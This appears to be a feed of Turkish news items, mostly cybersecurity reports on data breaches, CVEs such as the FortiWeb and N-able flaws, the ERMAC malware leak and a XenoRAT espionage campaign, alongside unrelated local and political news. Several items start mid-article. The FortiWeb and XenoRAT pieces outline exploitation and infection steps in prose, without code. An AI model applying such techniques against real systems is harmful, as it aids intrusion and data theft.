Beykozlular, yarı final karşılaşmasını sahilde kurulan dev ekran karşısında izleyerek milli takıma tezahüratlarla destek verecek. Etkinlik boyunca coşkulu atmosfer, Beykoz’u bir voleybol arenasına dönüştürecek.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kurum, Türkiye’de kullanılan tüm e-imzaların yalnızca BTK tarafından yetkilendirilen 8 Elektronik Sertifika Hizmet Sağlayıcı (ESHS) tarafından üretildiğini ve 5070 Sayılı Elektronik İmza Kanunu kapsamında denetlendiğini bildirdi.

"Veri havuzu bulunmamaktadır"
BTK, e-imza sisteminde kişisel verilerin kurum bünyesinde tutulmadığını, nitelikli elektronik sertifikaların yalnızca kullanıcıların USB cihazlarında bulunduğunu belirtti. Açıklamada, "Türkiye’de bulunan tüm e-imzalara ait bilgiler, BTK ya da e-Devlet kapısı dahil, toplu halde herhangi bir veri havuzunda barındırılmamaktadır." denildi.

Yanıltıcı bilgiye hapis cezası uyarısı
Kurum, siber güvenlik alanında yanıltıcı bilgi yaymanın panik ve endişe oluşturabileceğini hatırlatarak, bu tür eylemlerin 7545 sayılı Siber Güvenlik Kanunu kapsamında suç teşkil ettiğini duyurdu. Kanunun 16. maddesine göre gerçeğe aykırı siber saldırı veya veri sızıntısı iddiaları yayanlara 2 ila 5 yıl hapis cezası öngörülüyor.

Yasal süreç başlatıldı
BTK, yaklaşık 2 milyon 500 bin e-imza kullanıcısını hedef alan asılsız paylaşımlar nedeniyle sorumlu kişiler hakkında suç duyurusunda bulunulduğunu açıkladı.

BTK: "E-imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu"

Kaynak: CUMHA - CUMHUR HABER AJANSI

MHP Kırıkkale Milletvekili ve TBMM Adalet Komisyonu Üyesi Av. Halil Öztürk, yapay zekânın kötüye kullanımını önlemek amacıyla kapsamlı bir kanun teklifi hazırladı. Teklif, Türkiye’de yapay zekâ konusunda hazırlanan ilk kapsamlı yasal düzenleme olarak dikkat çekiyor.

Öztürk, yapay zekâ teknolojilerinin hızla geliştiğini, ancak bu durumun beraberinde kişilik haklarının ihlali, kamu düzeni tehditleri, deepfake içerikler ve dijital manipülasyon gibi riskler doğurduğunu belirtti.

Kanun teklifinin öne çıkan düzenlemeleri:

• Yapay zekâ kavramı ilk kez mevzuatta net şekilde tanımlanıyor.

• Yapay zekâya suç unsuru oluşturacak komut verenler doğrudan fail kabul edilerek TCK kapsamına alınıyor.

• Kamu güvenliğini tehdit eden veya kişilik haklarını ihlal eden yapay zekâ içeriklerinin 6 saat içinde kaldırılması zorunlu hale getiriliyor.

• Ayrımcı veri setlerinin kullanımı yasaklanıyor ve ihlal durumunda veri güvenliği suçu kapsamına giriyor.

• BTK’ya seçim güvenliği ve kamu düzenine yönelik içeriklere karşı acil müdahale yetkisi tanınıyor.

• İhlallerde 10 milyon TL’ye kadar idari para cezası uygulanabiliyor.

• Yapay zekâ ile çalışan sosyal ağ platformları da hukuki sorumluluk altına alınıyor.

Öztürk açıklamasında, “Bugün, bir milletin güvenliği yalnızca sınırlarında değil; dijital dünyadaki varlığında da şekillenmektedir. Yapay zekâya hâkim olamayan toplumlar bu teknolojinin esiri haline gelir. Biz bu teklifle diyoruz ki teknoloji aracılığıyla manipülasyona geçit vermeyelim.” ifadelerini kullandı.

Hazırlanan teklifin, Türkiye’nin dijital egemenliğini güçlendirmeyi, kamu düzenini korumayı ve vatandaşların güvenliğini sağlamayı amaçladığını vurgulayan Öztürk, “Bu kanun teklifi yalnızca bir hukuk metni değil, aynı zamanda Türkiye’nin dijital istiklali için bir taahhüttür.” dedi.

Teklif, TBMM Başkanlığına sunuldu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

170 tır insani yardım Gazze’ye ulaştırıldı

Osmanoğlu Yardımlaşma Derneği, Gazze Savaşı’nın başlamasından itibaren iki yıl boyunca yürüttüğü yardım çalışmalarına ilişkin raporunu paylaştı. Rapora göre, Refah Sınır Kapısı üzerinden Mısır Kızılayı’nın desteğiyle toplam 170 tır insani yardım Gazze’ye ulaştırıldı. Yardım sevkiyatlarında gıda, un, ilaç, hijyen malzemeleri, battaniye ve diğer temel ihtiyaç ürünleri yer aldı. Dağıtımlar, Gazze’deki yerel aşiret liderlerinin bilgisi ve denetimi altında şeffaf şekilde gerçekleştirildi.

Gıda kolileri ve nakit yardımları

Dernek, binlerce gıda kolisinin ihtiyaç sahibi ailelere ulaştırıldığını bildirdi. Özellikle yetimler, dullar ve en mağdur durumda olan ailelere düzenli nakit yardımı yapıldı. Bu destek sayesinde, ailelerin en zor dönemlerde dahi günlük temel ihtiyaçlarını karşılamaları sağlandı.

Saha mutfakları ve sıcak yemek desteği

Gazze’nin farklı bölgelerinde kurulan saha mutfaklarında her gün binlerce kişiye sıcak yemek pişirilerek dağıtıldı. Güvenlik riskinin arttığı günlerde ise hazır yemek paketleri ailelerin kapılarına kadar götürüldü. Ramazan aylarında ise buna ek olarak her gün on binlerce ekmek dağıtıldı.

İçme suyu krizi için düzenli dağıtım

Gazze’de yaşanan içme suyu sorununa karşı, dernek iki günde bir düzenli su dağıtımı yaptı. Böylece, birçok ailenin temiz suya erişim sorunu hafifletildi.

Mısır’daki Gazzeli mültecilere destek

Yardımlar yalnızca Gazze içinde değil, Mısır’a geçen mültecilere de ulaştırıldı. Mısır’daki Gazzelilere gıda kolileri ve temel ihtiyaç malzemeleri verildi.

Manevi destek ve şeffaflık

Osmanoğlu Yardımlaşma Derneği Başkanı Orhan Osmanoğlu’nun kaleme aldığı mektuplar, yardım dağıtımları sırasında ailelere okunarak Türkiye halkının duaları ve desteği hatırlatıldı. Ayrıca, yapılan tüm faaliyetlerin şeffaflık adına düzenli şekilde sosyal medya ve basın aracılığıyla paylaşıldığı belirtildi.

Bu gönderiyi Instagram'da gör

Orhan Osmanoğlu?? (@sehzadeorhan)'in paylaştığı bir gönderi

Bu gönderiyi Instagram'da gör

Orhan Osmanoğlu?? (@sehzadeorhan)'in paylaştığı bir gönderi

Kaynak: CUMHA - CUMHUR HABER AJANSI

Linux Türkiye Topluluğu, Debian Day kapsamında Türkiye’de eş zamanlı etkinlikler düzenleyeceğini duyurdu. Açıklamaya göre kutlamalar 31 Ağustos Pazar günü saat 15.00’te İstanbul, Ankara ve Eskişehir’de yapılacak.

Etkinliklerin amacı, Linux ve özgür yazılım dünyasının en önemli projelerinden biri olan Debian’ın 31. yılını topluluk bilinciyle kutlamak. Organizasyona Debian kullanıcılarının yanı sıra açık kaynak yazılıma ilgi duyan herkesin katılabileceği belirtildi.

Katılımcılar, gün boyunca sohbet etme, deneyim paylaşma ve özgür yazılımın toplumsal katkıları üzerine konuşma fırsatı bulacak.

Etkinlik adresleri:

• İstanbul: https://lnkd.in/dkkmaVFE
• Ankara: https://lnkd.in/dyxQ6bcY
• Eskişehir: https://lnkd.in/dvM4KU73

Linux Türkiye Topluluğu, tüm açık kaynak gönüllülerini etkinliğe davet etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ülkü Ocakları Genel Başkanı Ahmet Yiğit Yıldırım: “Türkofobi İzleme Merkezi çok yakında faaliyetlerine başlayacaktır”

Ülkü Ocakları Eğitim ve Kültür Vakfı, yurt dışında yaşayan Türklere yönelik önyargı, dışlayıcı tutum ve adaletsizlikleri belgelemek amacıyla “Türkofobi İzleme Merkezi” kurma hazırlığını duyurdu. Genel Başkan Ahmet Yiğit Yıldırım, merkezin bir hafıza ve takip mekanizması olarak çalışacağını ve mağduriyetlere çözüm üretmeyi hedeflediğini belirtti. 

Merkezin amacı ve kapsamı

Yıldırım, dünyanın dört yanındaki Türklerin okullarda, iş yaşamında ve gündelik hayatta maruz kaldığı önyargı ve adaletsizliklere dikkat çekti. Merkezin yalnızca kayıt tutan bir yapı olmayacağını, aynı zamanda çözüm adresi olacağını vurguladı. “Bu merkez bir hafıza, bir takip mekanizması ve aynı zamanda bir çözüm adresi olacaktır.” ifadelerini kullandı.

Hedef kitle ve çağrı

Yıldırım, yurt dışında yaşayan gençlere ve ailelere “Asla yalnız değilsiniz.” mesajı verdi. “Onların karşılaştığı her sorun bizim sorunumuzdur.” sözleriyle merkezin destek rolünü öne çıkardı. Türk kimliğiyle farklı coğrafyalarda yaşayanların yaşadığı her haksızlıkla mücadele edeceklerini belirtti. 

Yol haritası ve vurgular

Açıklamada, hareketin, MHP Genel Başkanı Devlet Bahçeli’nin yol göstericiliğiyle Türkiye’de ve dünyanın her köşesinde yaşayan Türklerin yanında olacağı ifade edildi. Merkezin Türk kimliğini koruyan bir siper ve gençler için yeni bir ufuk olacağı belirtildi. “Türkofobi İzleme Merkezi, Türk’ün hakkını savunan bir ses, kimliğini koruyan bir siper ve gençlerimiz için yeni bir ufuktur.” denildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri ihlali sonucunda TTB sisteminde yer alan kayıtlı dosyalara erişildiği ve bu dosyaların silindiği ifade edildi. İhlalden etkilenen gruplar arasında çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyeler yer aldı.

Hangi veriler etkilendi
Yapılan açıklamada, kimlik, iletişim, lokasyon, hukuki işlem ve işlem güvenliği verilerinin saldırıdan etkilendiği belirtildi. Üye veri tabanına erişim sağlanamadığı için kesin sayı belirlenemese de yaklaşık 107 bin kişinin bu ihlalden etkilenebileceği bildirildi.

KVKK kararı
Kişisel Verileri Koruma Kurulu (KVKK), 14 Ağustos 2025 tarihli ve 2025/1514 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Kurulun incelemelerinin sürdüğü aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hizmetlerde kesinti
Colt’un açıklamasına göre kesintiler; Colt Online, Voice API platformu ve barındırma/numara taşıma hizmetlerini etkiliyor. Müşteri iletişimi çevrimiçi portallar üzerinden sağlanamıyor, yalnızca e-posta ve telefon ile destek veriliyor. Şirket, etkilenen sistemlerin destek hizmetleri olduğunu, temel müşteri ağ altyapısının zarar görmediğini belirtti.

WarLock’un iddiası
‘cnkjasdfgd’ takma adlı bir tehdit aktörü, WarLock fidye yazılım grubu adına saldırıyı üstlendi. Aktör, Colt’tan çalındığını iddia ettiği bir milyon belgeyi 200.000 dolara satışa sundu ve bazı örnek dosyaları yayımladı. İddialara göre dosyalar; finansal veriler, çalışan ve müşteri bilgileri, üst düzey yöneticilere ait veriler, dahili e-postalar ve yazılım geliştirme belgelerini içeriyor.

Olası güvenlik açığı
Siber güvenlik araştırmacısı Kevin Beaumont, saldırganların Microsoft SharePoint’te bulunan ve CVE-2025-53770 olarak izlenen kritik uzaktan kod yürütme açığını kullanmış olabileceğini belirtti. Bu açık en az 18 Temmuz’dan itibaren sıfır gün olarak istismar edilmiş ve Microsoft tarafından 21 Temmuz’da yamalanmıştı.

Beaumont’a göre saldırganlar yüzlerce gigabaytlık müşteri verisi ve iç dokümanı sistemlerden dışarı çıkardı.

Colt’un açıklaması
Şirket sözcüsü, BleepingComputer’a yaptığı açıklamada, “Siber olayla ilgili iddiaların farkındayız, incelemelerimiz sürüyor. Teknik ekibimiz, üçüncü taraf uzmanlarla birlikte etkilenen sistemleri geri yüklemeye odaklanmış durumda” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Fortinet’in FortiWeb ürününde bulunan kritik bir güvenlik açığı, saldırganların herhangi bir kullanıcıyı, hatta yöneticileri taklit etmesine imkân tanıyor. CVE-2025-52970 olarak izlenen açık, 12 Ağustos’ta yayımlanan güncelleme ile kapatıldı.

Açığın teknik ayrıntıları
Araştırmacı Aviv Y tarafından “FortMajeure” adı verilen açık, FortiWeb’in çerez ayrıştırmasındaki “out-of-bounds read” hatasından kaynaklanıyor. Saldırgan, Era parametresine beklenmedik bir değer atayarak sunucunun tüm sıfırlardan oluşan gizli anahtarı kullanmasına neden oluyor. Bu durum, sahte kimlik doğrulama çerezlerinin kolayca oluşturulmasını sağlıyor.

Açığın başarılı şekilde istismar edilmesi için hedef kullanıcının aktif oturum açmış olması gerekiyor. Ardından saldırgan, çerezdeki küçük bir sayısal alanı brute-force yöntemiyle tahmin etmek zorunda. Ancak bu alanın değer aralığının 30’dan küçük olması, saldırıyı pratikte kolaylaştırıyor.

Etkilenen sürümler ve yamalar
Açık, FortiWeb’in 7.0 ile 7.6 arasındaki sürümlerini etkiliyor. Güvenli sürümler ise şu şekilde:

• FortiWeb 7.6.4 ve üzeri

• FortiWeb 7.4.8 ve üzeri

• FortiWeb 7.2.11 ve üzeri

• FortiWeb 7.0.11 ve üzeri

FortiWeb 8.0 sürümleri bu açıktan etkilenmiyor. Fortinet, geçici çözüm bulunmadığını ve tek etkili adımın güncelleme olduğunu duyurdu.

Araştırmacının kararı
Aviv Y, açığın temelini gösteren bir PoC paylaştı, ancak REST endpoint üzerinden yönetici taklidi dışında tüm istismar zincirini yayımlamadı. Tam kodun daha sonra açıklanacağını, böylece sistem yöneticilerine yamaları uygulama süresi tanındığını belirtti.

Araştırmacıya göre, eksik detaylar bilgili saldırganların bile tek başına tam bir istismar geliştirmesine imkân vermiyor. Ancak duyuruların ardından siber suçluların hızlıca harekete geçtiği düşünüldüğünde, FortiWeb kullanıcılarının derhal güncelleme yapması gerekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin California eyaletinde merkezi bulunan Workday, üçüncü taraf müşteri ilişkileri yönetim (CRM) platformuna yönelik bir sosyal mühendislik saldırısında veri ihlali yaşandığını duyurdu. Şirket, olayda müşteri kiracı verilerine erişim sağlanmadığını ancak bazı iş iletişim bilgilerinin sızdırıldığını açıkladı.

Saldırının ayrıntıları
Workday’in 16 Ağustos’ta yaptığı duyuruya göre saldırganlar, şirket çalışanlarını hedef alan sosyal mühendislik yöntemleriyle CRM platformuna erişim sağladı. Açığa çıkan veriler arasında ad, e-posta adresi ve telefon numaraları gibi bilgilerin bulunduğu belirtildi. Şirket, bu tür bilgilerin sonraki oltalama saldırılarında kullanılabileceği uyarısında bulundu.

Olayın 6 Ağustos’ta tespit edildiği ve saldırganların kendilerini İK veya BT çalışanı gibi tanıtarak mesaj ve telefon yoluyla bilgi toplamaya çalıştığı bildirildi.

ShinyHunters bağlantısı
Olay, ShinyHunters grubuyla ilişkilendirilen küresel saldırı dalgasının bir parçası. Grup, yıl başından bu yana Salesforce tabanlı CRM sistemlerini hedef alarak kötü amaçlı OAuth uygulamaları üzerinden veritabanlarına erişiyor. Daha önce Adidas, Qantas, Allianz Life, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi büyük şirketler de benzer saldırılardan etkilendi.

Çalınan veriler, e-posta yoluyla kurbanlardan fidye talep etmek amacıyla kullanılıyor. ShinyHunters, daha önce Snowflake, AT&T ve PowerSchool saldırılarıyla da gündeme gelmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Popüler ağ yönetim platformu N-able N-central’da keşfedilen iki kritik güvenlik açığı, dünya genelinde yüzlerce sunucuyu risk altında bırakıyor. CVE-2025-8875 ve CVE-2025-8876 olarak takip edilen açıklar, kimliği doğrulanmış saldırganların komut enjeksiyonu yapmasına ve güvenli olmayan serileştirme zafiyeti üzerinden komut çalıştırmasına imkân tanıyor.

Durumun ciddiyeti
N-able, açıkların yamalandığını ve 2025.3.1 sürümüyle kapatıldığını duyurdu. Ancak Shadowserver Foundation verilerine göre hâlâ 880 sunucu güncellenmedi. Çoğu ABD, Kanada ve Hollanda’da bulunuyor. Shodan aramalarında internete açık yaklaşık 2.000 N-central örneği görüldü.

N-able, yaptığı açıklamada güvenlik ihlallerinin yalnızca sınırlı sayıda şirket içi ortamda gözlemlendiğini, kendi bulut ortamlarında ise istismar tespit edilmediğini bildirdi.

CISA’dan zorunlu talimat
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), açıkları “bilinen istismar edilen güvenlik açıkları” listesine ekledi. Federal kurumların, özellikle İç Güvenlik Bakanlığı, Hazine Bakanlığı ve Enerji Bakanlığı’nın sistemlerini 20 Ağustos’a kadar yamalaması zorunlu hale getirildi.

CISA, özel sektör kuruluşlarına doğrudan yükümlülük getirmese de tüm ağ yöneticilerini N-able’ın yayımladığı yamaları uygulamaya, aksi halde ürünü devre dışı bırakmaya çağırdı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olmaya devam ediyor” denildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İngiltere’de 26 yaşındaki Al-Tahery Al-Mashriky, binlerce web sitesine saldırdığı ve milyonlarca kişiye ait bilgileri çaldığı suçlamalarını kabul ederek 20 ay hapis cezası aldı.

Soruşturmanın geçmişi
Mashriky, 2022 yılında ABD kolluk kuvvetlerinden gelen bilgiler doğrultusunda İngiltere’de tutuklandı. Mart 2025’te görülen davada suçunu kabul ederek dokuz suçtan hüküm giydi. Suçlamalar arasında Facebook kullanıcılarına ait milyonlarca giriş bilgisinin çalınması, Yemen hükümeti ve İsrail merkezli bir haber sitesi gibi kurumların hacklenmesi yer aldı.

Hedef alınan kurumlar
Adli incelemeler, Yemen Dışişleri Bakanlığı ve Yemen Güvenlik Medya Bakanlığı’nın sitelerine sızıldığını ve bu sitelerde kullanıcı adı tarama araçları yerleştirildiğini ortaya koydu. Ayrıca İsrail’deki Live News sitesinin yönetici sayfalarına erişildi ve tüm içerik indirildi. ABD ve Kanada’daki dini kuruluşlar ile Kaliforniya Su Kurulu da hedefler arasında bulundu.

Çalınan veriler
Mashriky’nin elinde 4 milyondan fazla Facebook kullanıcısına ait veriler, ayrıca Netflix ve PayPal gibi hizmetlere ait çalıntı kullanıcı bilgileri bulundu. Saldırıların bazılarında web siteleri siyasi ve dini içeriklerle tahrif edildi.

Ulusal Suç Ajansı açıklaması
İngiltere Ulusal Suç Ajansı (NCA) Siber Suç Birimi Başkanı Paul Foster, Mashriky’nin saldırılarının büyük ölçüde kesinti yarattığını belirterek, “Bu saldırılar yalnızca siyasi ve ideolojik mesaj yaymak için yapıldı. Ayrıca milyonlarca kişiyi dolandırmaya imkân sağlayacak kişisel verileri de ele geçirdi” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sızıntının içeriği
Arşivde zararlının PHP tabanlı komuta-kontrol altyapısı, React ile hazırlanmış operatör paneli, Go dilinde yazılmış veri sızdırma sunucusu, Kotlin tabanlı arka kapı ve özelleştirilmiş APK üreticisi yer aldı. Analizler, ERMAC 3.0’ın önceki sürümlere kıyasla kapsamını önemli ölçüde genişlettiğini gösterdi.

Hedefler ve yetenekler
ERMAC’ın yeni sürümü, bankacılık, alışveriş ve kripto para uygulamaları dahil olmak üzere 700’den fazla mobil uygulamayı hedefliyor. Zararlı yazılım; SMS, kişi listesi ve hesap bilgilerini çalabiliyor, Gmail içeriklerine erişebiliyor, sahte bildirimler gösterebiliyor, cihaz kamerasıyla fotoğraf çekebiliyor ve uzaktan uygulama yönetimi yapabiliyor. Ayrıca, cihazdan dosya indirme, çağrı yönlendirme ve SMS gönderme gibi iletişim suiistimali özelliklerine de sahip.

Altyapı zafiyetleri
Hunt.io, sızıntı sayesinde ERMAC’ın canlı komuta-kontrol sunucularını ve operatör panellerini tespit etti. İncelemelerde sabitlenmiş JWT tokenleri, varsayılan kök kullanıcı bilgileri ve korumasız yönetim panelleri gibi ciddi güvenlik açıkları bulundu. Bu durum, altyapının dışarıdan erişime ve manipülasyona açık hale gelmesine neden oldu.

Olası etkiler
Kaynak kod sızıntısının, ERMAC’ı “hizmet olarak kötü amaçlı yazılım” (MaaS) modelinde kullanan suçluların güvenini zedelemesi bekleniyor. Güvenlik çözümlerinin ERMAC’ı daha iyi tespit etmesi mümkün olsa da, kodun diğer tehdit aktörlerinin eline geçmesi durumunda daha gelişmiş ve tespit edilmesi zor yeni varyantların ortaya çıkabileceği değerlendiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin Nebraska eyaletinde yaşayan Charles O. Parks III, “CP3O” takma adıyla yürüttüğü kripto madenciliği operasyonu nedeniyle 1 yıl hapis cezasına mahkum edildi. Parks, iki büyük bulut bilişim sağlayıcısını 3,5 milyon dolar dolandırarak yaklaşık 1 milyon dolar değerinde kripto para elde etti.

Dolandırıcılık yöntemi
Savcılık belgelerine göre Parks, “CP3O LLC” ve “MultiMillionaire LLC” gibi sahte şirketler kurarak Microsoft ve Amazon merkezli bulut hizmet sağlayıcıları da kapsayan platformlardan yüksek seviyeli işlem gücü aldı. Ocak–Ağustos 2021 arasında faturaları ödemeyerek sağlayıcıların dikkatini farklı bahanelerle dağıttı. Bir şirket yetkililerine, küresel bir çevrimiçi eğitim platformu kurduğunu ve 10 bin öğrenciye hizmet vermeyi planladığını söyledi.

Kripto madenciliği ve kara para aklama
Elde ettiği işlem gücüyle Monero (XMR), Ether (ETH) ve Litecoin (LTC) üreten Parks, kripto varlıklarını çeşitli borsalar, çevrimiçi ödeme hizmetleri, New York merkezli bir NFT pazarı ve banka hesapları üzerinden akladı. Tüm varlıkları nakde çevirerek lüks bir Mercedes-Benz S AMG otomobil, mücevherler ve birinci sınıf seyahatler satın aldı.

Kamuoyuna yansımaları
Savcılık açıklamasında Parks’ın kendisini kripto alanında “inovatif bir düşünce lideri” gibi gösterdiği, ancak gerçekte “yalnızca bir dolandırıcı” olduğu ifade edildi. Parks’ın, 2022’de YouTube kanalında “MultiMillionaire Mentality” başlıklı bir video yayımlayarak sözde zenginlik ipuçlarını paylaştığı da belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Trellix tarafından yayımlanan rapora göre, devlet destekli olduğu değerlendirilen bir casusluk kampanyası Güney Kore’deki yabancı elçilikleri hedef alıyor. Kampanyada XenoRAT zararlı yazılımı, sahte diplomatik e-postalarla dağıtılıyor.

Çok aşamalı saldırılar
Saldırılar Mart ayında başladı ve halen devam ediyor. İlk olarak Orta Avrupa’daki bir elçilik hedef alınırken, Mayıs ayında Batı Avrupa elçiliklerine sahte toplantı davetleri gönderildi. Haziran ve Temmuz aylarında ise ABD–Kore askeri iş birliği temalı oltalama e-postaları öne çıktı.

E-postalar, diplomat kimliğine bürünerek sahte toplantı davetleri, resmi yazılar ve etkinlik çağrıları şeklinde hazırlandı. İçerikler çok dilli olarak Korece, İngilizce, Fransızca, Arapça, Farsça ve Rusça yazıldı ve çoğu zaman gerçek diplomatik etkinliklerle eşleştirildi.

Zararlı yazılım dağıtımı
Saldırganlar, Dropbox, Google Drive ve Daum gibi servislerde barındırılan parola korumalı ZIP dosyaları kullandı. Dosyalarda PDF gibi görünen LNK dosyaları yer aldı. Bu dosyalar çalıştırıldığında gizlenmiş PowerShell komutları devreye girerek GitHub veya Dropbox’tan XenoRAT yükünü indiriyor ve sistemde kalıcılık sağlıyor.

XenoRAT, tuş kaydı alma, ekran görüntüsü alma, kamera ve mikrofon erişimi, dosya transferi ve uzaktan komut yürütme gibi özelliklere sahip. Bellekte doğrudan yüklenmesi ve Confuser Core ile gizlenmesi sayesinde tespit edilmesi zorlaşıyor.

Kimin arkasında olduğu tartışılıyor
Saldırılarda kullanılan altyapı ve teknikler, Kuzey Kore bağlantılı Kimsuky (APT43) grubunu işaret ediyor. Ancak saldırıların zamanlaması ve tatil dönemlerindeki duraksamalar Çin takvimine uyum gösteriyor. Bu nedenle Trellix, kampanyayı APT43’e “orta düzey güvenle” atfederek Çin desteği ihtimalini de göz ardı etmiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’de faaliyet gösteren ve Allianz SE’nin iştiraki olan Allianz Life, Temmuz ayında gerçekleşen büyük çaplı bir veri ihlalini doğruladı. Şirketin 1,4 milyon müşterisinin “çoğunluğunu” etkileyen olayda, 1,1 milyon kişinin kişisel bilgileri saldırganlar tarafından ele geçirildi.

Saldırının yöntemi
Siber saldırı, 16 Temmuz’da üçüncü taraf bulut tabanlı CRM sistemi Salesforce üzerinden gerçekleştirildi. ShinyHunters grubu, çalışanları kandırarak şirketin Salesforce altyapısına kötü amaçlı bir OAuth uygulaması bağladı. Bu erişim üzerinden müşteri ve iş ortaklarına ait veritabanları indirildi.

Çalınan veriler
Sızdırılan bilgiler arasında ad-soyad, e-posta adresi, cinsiyet, doğum tarihi, telefon numarası ve fiziksel adresler yer alıyor. Bazı dosyalarda vergi kimlik numaraları ve diğer finansal bilgiler de bulundu. Veri ihlali bildirim hizmeti Have I Been Pwned, toplamda 2,8 milyon kaydın sızdırıldığını açıkladı.

ShinyHunters’ın rolü
ShinyHunters grubu, Allianz Life’ın yanı sıra Google, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Workday gibi birçok büyük kurumu da hedef aldı. Grup, geçmişte Snowflake, AT&T ve PowerSchool gibi saldırılarla da gündeme gelmişti.

Allianz Life’ın açıklaması
Şirket, devam eden soruşturma nedeniyle ayrıntı veremeyeceğini, ancak bazı çalışanların da veri ihlalinden etkilendiğini doğruladı. Allianz Life, etkilenen müşterilerle iletişime geçtiğini ve incelemelerin sürdüğünü bildirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Altı ay sonra tespit edildi
BCNYS, saldırıyı yaklaşık altı ay sonra, 4 Ağustos’ta fark etti. Yapılan incelemelerde, tehdit aktörlerinin kişisel, finansal ve sağlık bilgilerini içeren dosyalara erişerek kopyaladığı ortaya çıktı.

Çalınan veriler
Etkilenen bilgiler arasında ad-soyad, Sosyal Güvenlik numarası, doğum tarihi, eyalet kimlik numarası, banka ve hesap bilgileri, kredi kartı numarası, PIN kodları, kart son kullanma tarihleri ve vergi mükellefi kimlik numaraları yer alıyor. Ayrıca tıbbi sağlayıcı adı, teşhis ve tedavi bilgileri, reçete bilgileri ve sağlık sigortası verileri de saldırıda ifşa edildi.

Alınan önlemler
BCNYS, olayın ardından dış uzmanlardan destek alarak sistemlerini güvenceye aldığını ve kapsamlı bir soruşturma başlattığını açıkladı. Şimdiye kadar finansal dolandırıcılık veya kimlik hırsızlığına dair kanıt bulunmadığı ifade edildi. Sosyal Güvenlik numarası ifşa olan kişilere ücretsiz kredi izleme hizmeti sağlanacak.

Kurum, etkilenen bireyleri hesap ekstrelerini ve ücretsiz kredi raporlarını düzenli olarak kontrol etmeleri konusunda uyardı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin Indiana eyaletinde faaliyet gösteren ilaç şirketi Inotiv, 8 Ağustos 2025’te gerçekleşen bir fidye yazılım saldırısının şirketin operasyonlarını etkilediğini açıkladı. U.S. Securities and Exchange Commission (SEC) başvurusunda paylaşılan bilgilere göre saldırganlar, şirketin bazı sistemlerine yetkisiz erişim sağladı ve verileri şifreledi.

Saldırıyı Qilin üstlendi
Qilin fidye yazılım grubu, saldırıyı kendi sızıntı sitesinde duyurarak yaklaşık 176 GB büyüklüğünde 162.000 dosyayı ele geçirdiğini öne sürdü. Grup, çaldığı verilerden bazı örnekleri de yayımladı.

Alınan önlemler
Inotiv, olayın ardından harici siber güvenlik uzmanlarıyla birlikte soruşturma başlattı ve kolluk kuvvetlerini bilgilendirdi. Şirketin IT ekibi, etkilenen sistemleri yeniden işler hale getirmek için çalışmalar yürütüyor. Bazı iş süreçleri ise çevrimdışı alternatiflere taşınarak kesintilerin etkisi azaltılmaya çalışılıyor.

Şirket, saldırının veritabanları ve iş süreçlerinde kullanılan bazı iç uygulamaları etkilediğini, bu nedenle operasyonlarda aksaklıkların bir süre daha devam etmesini beklediklerini duyurdu. Normal işleyişe dönüş için net bir tarih verilmedi.

Inotiv hakkında
Yaklaşık 2.000 kişiyi istihdam eden ve yıllık 500 milyon dolardan fazla gelir elde eden Inotiv, ilaç keşfi, geliştirilmesi, güvenlik değerlendirmesi ve canlı hayvan araştırma modelleri konularında uzmanlaşmış bir sözleşmeli araştırma kuruluşu olarak faaliyet gösteriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İddialar
AshES Cybersecurity, Elastic Defend’in elastic-endpoint-driver.sys adlı sürücüsünde NULL pointer dereference hatası bulunduğunu, bunun da EDR korumasını atlatmaya, uzaktan kod yürütmeye ve kalıcılık sağlamaya yol açabileceğini öne sürdü. Araştırmacı, kendi hazırladığı sürücü ile bu hatayı tetiklediğini, Windows’un çökmesini ve calc.exe dosyasının EDR tarafından engellenmeden açılmasını gösteren iki video yayımladı.

Elastic’in yanıtı
Elastic Güvenlik Mühendisliği ekibi, iddiaları inceleyerek rapor edilen açığın yeniden üretilemediğini belirtti. Şirket, AshES tarafından gönderilen raporların tekrarlanabilir bir sömürü kanıtı içermediğini ve araştırmacının PoC paylaşmayı reddettiğini duyurdu.

Elastic açıklamasında, güvenlik araştırmalarında koordineli açıklamanın esas olduğunu, ancak bu raporda sürecin takip edilmediğini vurguladı. Şirket, 2017’den bu yana hata ödül programı kapsamında güvenlik araştırmacılarına 600.000 dolardan fazla ödeme yapıldığını hatırlattı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Okta, Auth0 kullanıcılarının güvenlik tehditlerini daha hızlı tespit edebilmesi için Sigma tabanlı kurallardan oluşan açık kaynaklı bir “Customer Detection Catalog” yayımladı. Yeni kurallar seti, şüpheli etkinliklerin log kayıtları üzerinden daha kolay analiz edilmesini sağlayarak hesap ele geçirme ve yapılandırma hataları gibi risklere karşı koruma sunuyor.

Yeni katalog neler içeriyor
Auth0, dünya genelinde birçok kurum tarafından kimlik doğrulama ve kullanıcı yönetimi amacıyla kullanılan bir platform. Daha önce kullanıcıların şüpheli aktiviteleri tespit etmek için kendi kurallarını yazmaları gerekiyordu. Okta’nın yayımladığı katalog ise, topluluk katkısına açık şekilde sürekli güncellenen hazır sorgular sunuyor.

